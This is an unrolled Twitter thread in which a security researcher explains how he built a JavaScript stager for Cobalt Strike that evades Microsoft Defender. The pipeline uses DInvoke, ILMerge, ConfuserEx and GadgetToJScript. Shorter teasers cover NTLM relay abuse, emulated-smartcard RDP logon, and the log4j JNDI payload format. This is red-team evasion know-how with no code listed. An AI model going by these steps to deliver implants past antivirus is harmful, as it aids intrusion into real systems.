Share this page!

Enter Twitter Thread URL to Unroll

Needs to be the full URL like: https://twitter.com/threadreaderapp/status/1644127596119195649

How to get URL link on Twitter App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
an0n Profile picture
@an0n_r0
Jun 11 9 tweets 3 min read Twitter logo Read on Twitter
Built a special JS stager for Cobalt Strike (or for anything else).

Actually it is based on C# .NET, and it is super simple (full source is on the screenshot) because it uses the PE mapper from DInvoke.

Currently managed to bypass Defender.

Sharing some details in this thread. Image
First, I started from a stageless Cobalt Strike beacon payload generated using my custom Artifact Kit, already including some advanced evasion features what I didn't want to rewrite again.

That's why I turned to PE staging instead of the common shellcode loading technique.
Luckily, DInvoke (besides other super features) supports manual PE mapping of unmanaged code from managed .NET projects out-of-the-box.

thewover.github.io/Dynamic-Invoke/

The only difficulty in using DInvoke is that it is flagged by most AV products.
My final goal was to create a JS initial payload. Here comes GadgetToJScript in the picture.

github.com/med0x2e/Gadget…

It is an awesome tool for building JS payloads from .NET assemblies, but there were issues about packaging the stager assembly and the DInvoke module together.
What worked for me after a long trial and error process: used ILMerge for linking the SimpleStager.exe and DInvoke.dll assemblies together.

github.com/dotnet/ILMerge

Other solutions (Costura Fody or ConfuserEx compressor) were failing in the GadgetToJScript deserialization phase.
After merging the assemblies, applied ConfuserEx 2 for obfuscation in order to make the job of AV harder.

mkaring.github.io/ConfuserEx/

Had to play with various features (what to add and what not) in order to make GadgetToJScript deser. working (and AV happy at the same time :) ).
Finally, the SimpleStager with DInvoke, merged with ILMerge, obfuscated with ConfuserEx 2, and packed into JS with GadgetToJScript, bypassed Defender with my Cobalt Strike stageless DLL payload (of course built with custom Artifact Kit including advanced evasion features). Image
As a sidenote, for GadgetToJScript against Defender, some basic tweak to the default template was needed. Nothing fancy, just a slight modification. :)

Last note: for convenience, the whole build process could be automated by adding NuGet packages and/or including dependent projects and adding the appropriate configuration in the Visual Studio Solution. Image

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with an0n

an0n Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @an0n_r0

an0n Profile picture
Jan 22
If NetNTLMv1 is disabled but LDAP signing is not enforced on DC, and there is WebClient service enabled on the target, pwn is similar (~RBCD abuse). NTLM relay should be HTTP->LDAP instead of SMB->LDAP (WebClient does not set signature requirement on the client side).
WebDAV target for coerced NTLM auth should be a dotless hostname (conforming Trusted/Intranet zone). No worries, arbitrary hostname can be registered even using a low-privileged domain account in ADIDNS (using the dnstool script in krbrelayx).
And what if WebClient is not running (but installed) on the target? Startup is triggered when anyone opens a folder with a searchConnector-ms file containing an HTTP URL iconReference.🙂
Read 4 tweets
an0n Profile picture
Aug 19, 2022
RDP logon with certificate: @_EthicalChaos_ is releasing a dedicated tool for this soon!

Until that, here is how I did this before (from Linux): simulating PIV applet on an emulated smartcard device locally and pass it through RDP. 🧵/1 👇
First component needed: vpcd frankmorgner.github.io/vsmartcard/vir…, a virtual smart card device, what is actually emulating a software smart card reader in the PC/SC Smart Card Daemon. Just add vpcd into pcscd. 🧵/2 👇
Next step is inserting a proper smart card into the virtual smart card reader device. Simulating PIV with PivApplet: github.com/OpenSC/OpenSC/…, a Personal Identity Verification compatible JavaCard applet using jCardSim jcardsim.org 🧵/3 👇
Read 5 tweets
an0n Profile picture
Aug 17, 2022
If you want to browse the customer service locations of the Hungarian State Treasury on allamkincstar.gov.hu, it is good to have some basic #ReverseEngineering skills. 😉 #UXFail @AdobeFlash in 2022. Thread 1/🧵⬇️ Image
It is relatively easy to navigate to a customer service selector page. At the bottom there should be a county chooser according to the text, but there is nothing below. Let’s see why. 2/🧵⬇️ Image
In the source code we can see that the webpage contains a Flash (SWF) object included. Yes, the county chooser of allamkincstar.gov.hu is a flash object, even though it is 2022 and @AdobeFlash is EOL and support has been removed from the browsers for over >1.5 year. 3/🧵⬇️ Image
Read 7 tweets
an0n Profile picture
Dec 10, 2021
#log4j storm is coming, cryptominers in the first wave.

checked multiple (non-java ;) ) webservers i run and the logs are getting filled with the ${jndi:ldap://...} payloads.

THREAD: let's see a weaponized one.
one common scheme is: ldap://host:port/Basic/Command/Base64/[base64encodedstring].

some of the LDAP urls are still accessible (usually only from targeted IPs, other IPs are firewalled). getting the LDAP data returns the JNDI object.
Unfortunately this javaCodeBase URL became offline at the moment, but the Base64 encoded part is simple bash, so the "foo" class should be a basic OS command launcher.
Read 8 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(